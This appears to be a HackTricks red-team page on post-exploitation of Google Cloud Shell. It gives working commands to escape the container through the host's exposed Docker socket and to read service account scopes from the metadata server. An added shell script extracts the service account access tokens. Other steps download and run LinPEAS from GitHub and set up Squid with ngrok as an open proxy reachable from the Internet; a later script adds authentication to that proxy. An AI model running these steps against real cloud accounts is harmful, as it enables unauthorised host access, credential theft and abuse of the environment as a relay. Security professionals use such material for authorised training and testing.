GCP - Cloud Shell Post Exploitation


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Cloud Shell

For more information about Cloud Shell check:

GCP - Cloud Shell Enum

Container Escape

Note that Google Cloud Shell runs inside a container, and the host's Docker socket is exposed to it; you can easily escape to the host by doing:

bash
# The host's Docker socket is mounted into the Cloud Shell container at /google/host/var/run/docker.sock
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
# Start a privileged container on the host with host networking and the host's /, /proc and /sys bind-mounted
# (paths in -v are resolved by the host's Docker daemon, so "/" is the host's root filesystem)
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
# No-op if "run -d" already started it; useful to restart it after a Cloud Shell session ends
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
# Get a shell in it; the host's filesystem is under /rootfs ("chroot /rootfs" gives a host shell)
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

Google does not consider this a vulnerability, but it gives you a broader view of what is going on in that environment.

Moreover, note that from the host you can obtain the service account token from the metadata server. First list the service accounts attached to the host:

bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
# Output: one entry per attached service account
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

And the following scopes:

bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
# Output:
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
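The two wget commands above walk the metadata server by hand. The following script is an added example (not code from the original page) that turns that walk into reusable functions: it lists the attached service accounts, resolves each alias to its email, prints the scopes and pulls the access token out of the `.../token` endpoint. It assumes the documented `metadata.google.internal` alias for the `metadata` host and the documented `Metadata-Flavor: Google` header (the page uses the older `X-Google-Metadata-Request: True`), and that the token endpoint answers with JSON of the form `{"access_token":"ya29...","expires_in":3599,"token_type":"Bearer"}`; run it as `sh enum_sa.sh enum` inside the escaped host container.

```sh
#!/bin/sh
# Added example: enumerate service accounts, scopes and tokens via the GCE
# metadata server. Assumptions: host alias metadata.google.internal, header
# Metadata-Flavor: Google, token endpoint returning {"access_token": ...}.
METADATA_BASE="http://metadata.google.internal/computeMetadata/v1"

# metadata_get <path>: GET one path below computeMetadata/v1 (fails on non-2xx).
metadata_get() {
  curl -sf -H "Metadata-Flavor: Google" "$METADATA_BASE/$1"
}

# list_service_accounts: the directory listing has one entry per line with a
# trailing slash ("default/", "<email>/"); strip the slash.
list_service_accounts() {
  metadata_get "instance/service-accounts/" | sed 's#/$##'
}

# sa_email <sa>: resolve an alias such as "default" to the account email.
sa_email() {
  metadata_get "instance/service-accounts/$1/email"
}

# sa_scopes <sa>: one OAuth scope URL per line.
sa_scopes() {
  metadata_get "instance/service-accounts/$1/scopes"
}

# has_scope <sa> <short-scope>: exit 0 if the account carries
# https://www.googleapis.com/auth/<short-scope>, e.g. devstorage.read_only.
has_scope() {
  sa_scopes "$1" | grep -q "^https://www.googleapis.com/auth/$2\$"
}

# sa_token <sa>: extract only the access_token field from the token JSON
# (sed instead of jq, so it works on a minimal Alpine container).
sa_token() {
  metadata_get "instance/service-accounts/$1/token" \
    | sed -n 's/.*"access_token" *: *"\([^"]*\)".*/\1/p'
}

# main: print every account, its scopes and a prefix of its token.
main() {
  for sa in $(list_service_accounts); do
    echo "== $sa ($(sa_email "$sa"))"
    sa_scopes "$sa" | sed 's/^/   scope: /'
    tok=$(sa_token "$sa")
    echo "   token: $(printf '%s' "$tok" | cut -c1-12)... (${#tok} chars)"
    if has_scope "$sa" devstorage.read_only; then
      echo "   -> devstorage.read_only: use the token as 'Authorization: Bearer' against the Storage JSON API"
    fi
  done
}

# Only talk to the metadata server when asked explicitly, so the file can also
# be sourced for its functions.
case "${1-}" in enum) main ;; esac
```

The token printed by `sa_token` is what you feed to bf_my_gcp_permissions; the scopes tell you which APIs the token can reach at all, regardless of the IAM roles behind it (a `devstorage.read_only` token cannot call Compute even if the account holds a Compute role).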

Enumerate the metadata with LinPEAS:

bash
cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

After using https://github.com/carlospolop/bf_my_gcp_permissions with the Service Account token, no permissions were discovered...

Use as Proxy

If you want to use your Google Cloud Shell instance as a proxy you need to run the following commands (or put them in the .bashrc file):

bash
sudo apt install -y squid

Just so you know, Squid is an HTTP proxy server. Create a squid.conf file with the following settings:

bash
http_port 3128
cache_dir /var/cache/squid 100 16 256
# "all" is already a built-in ACL on Squid >= 3.2; redefining it only produces a warning
acl all src 0.0.0.0/0
# This is an open proxy: anyone who can reach the port can relay traffic through your Cloud Shell
http_access allow all

Copy the squid.conf file to /etc/squid:

bash
sudo cp squid.conf /etc/squid

Finally, start the squid service:

bash
sudo service squid start

Use ngrok to make the proxy reachable from outside:

bash
./ngrok tcp 3128

Once it is running, copy the tcp:// URL. If you want to use the proxy from a browser, remove the tcp:// prefix and the port from that URL and enter the port in the port field of your browser's proxy settings (squid is an HTTP proxy server).

To have everything set up at startup, the .bashrc file should contain the following lines:

bash
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
# Assumes the ngrok binary was unpacked into ~/ngrok; ngrok stays in the foreground
cd ngrok;./ngrok tcp 3128
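The steps above leave an open proxy on the Internet (ngrok forwards anything that reaches the public endpoint to port 3128, and `http_access allow all` accepts it). The following script is an added example, not code from the original page or from the referenced repository: it generates a squid.conf that requires a username and password, installs everything in one go, and reads the public tcp:// endpoint from ngrok's local API instead of copying it by hand. It assumes Debian defaults (Cloud Shell is Debian-based): the `basic_ncsa_auth` helper at `/usr/lib/squid/basic_ncsa_auth` from the squid package, `htpasswd` from `apache2-utils`, the ngrok binary in `~/ngrok`, and ngrok's agent API listening on `127.0.0.1:4040`.

```sh
#!/bin/sh
# Added example: authenticated Squid proxy on Cloud Shell exposed through ngrok.
# Assumptions (Debian defaults): basic_ncsa_auth path, apache2-utils for htpasswd,
# ngrok binary in ~/ngrok, ngrok agent API at http://127.0.0.1:4040.
SQUID_CONF=/etc/squid/squid.conf
SQUID_PASSWD=/etc/squid/passwd
NCSA_AUTH=/usr/lib/squid/basic_ncsa_auth

# squid_conf <port>: print a squid.conf that only serves authenticated clients.
# Contrast with the page's config: "http_access allow all" is replaced by an
# auth-gated allow followed by "deny all".
squid_conf() {
  cat <<EOF
http_port $1
cache_dir /var/cache/squid 100 16 256
# Basic auth backed by an htpasswd file; "all" is a built-in ACL on Squid >= 3.2
auth_param basic program $NCSA_AUTH $SQUID_PASSWD
auth_param basic realm proxy
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
http_access deny all
EOF
}

# parse_ngrok_url <tcp://host:port>: print "host port", which is exactly what the
# browser proxy dialog wants (host without tcp://, port in the port field).
parse_ngrok_url() {
  hp=${1#tcp://}
  host=${hp%:*}
  port=${hp##*:}
  [ -n "$host" ] && [ -n "$port" ] && [ "$host" != "$port" ] || return 1
  echo "$host $port"
}

# ngrok_public_url: ask the ngrok agent API for the first tcp public_url.
# The API answers JSON such as {"tunnels":[{"public_url":"tcp://0.tcp.ngrok.io:12345",...}]}
ngrok_public_url() {
  curl -sf http://127.0.0.1:4040/api/tunnels \
    | sed -n 's/.*"public_url" *: *"\(tcp:\/\/[^"]*\)".*/\1/p' | head -n 1
}

# setup_proxy [user] [port]: install, configure, start Squid and expose it.
setup_proxy() {
  user=${1:-proxyuser}; port=${2:-3128}
  sudo apt-get install -y squid apache2-utils      # apache2-utils provides htpasswd
  sudo htpasswd -c -m "$SQUID_PASSWD" "$user"       # prompts for the password (MD5 hash, supported by basic_ncsa_auth)
  squid_conf "$port" | sudo tee "$SQUID_CONF" >/dev/null
  sudo service squid restart
  (cd "$HOME/ngrok" && ./ngrok tcp "$port" >/dev/null 2>&1 &)
  sleep 3                                           # give the agent time to register the tunnel
  set -- $(parse_ngrok_url "$(ngrok_public_url)")
  echo "Browser proxy settings: host=$1 port=$2 user=$user"
}

# Only run the installation when asked: "sh proxy.sh setup [user] [port]"
case "${1-}" in setup) shift; setup_proxy "$@" ;; esac
```

Because ngrok runs in the background here, the script returns to the prompt; add `sh ~/proxy.sh setup` to .bashrc if you want it at every start, keeping in mind that `htpasswd -c` prompts interactively the first time.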

The instructions were copied from https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Check that page for other neat ideas for running any kind of software (databases and even Windows) in Cloud Shell.
